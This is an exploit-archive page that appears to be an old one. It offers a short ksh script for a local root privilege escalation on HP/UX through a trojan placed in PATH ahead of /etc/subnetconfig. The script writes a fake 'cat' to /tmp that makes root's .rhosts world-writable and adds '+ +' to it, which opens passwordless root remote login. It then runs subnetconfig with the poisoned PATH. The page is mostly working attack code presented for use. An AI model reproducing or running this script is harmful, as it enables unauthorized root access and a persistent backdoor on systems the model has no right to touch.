|
| Summary |
|---|
| Description: | trojan in path vulnerability in subnetconfig |
| Author: | Colonel Panic of SOD (sod@command.com.inter.net) |
| Compromise: | root (local) |
| Vulnerable Systems: | HP/UX with vulnerable netconfig, possibly just 9.0 |
| Date: | OLD |
| Notes: | See the SOD HP Bug of the Week page |
| Details |
|---|
#!/bin/ksh echo '#!/bin/ksh' > /tmp/cat echo 'chmod 666 ~root/.rhosts' >> /tmp/cat echo 'echo + + >> ~root/.rhosts' >> /tmp/cat chmod 777 /tmp/cat PATH=/tmp:$PATH export PATH /etc/subnetconfig rm /tmp/cat
| More Exploits! |
|---|
| All OS's | Linux | Solaris/SunOS | Micro$oft |
| *BSD | Macintosh | AIX | IRIX |
| ULTRIX/Digital UNIX | HP/UX | SCO | Remote exploits |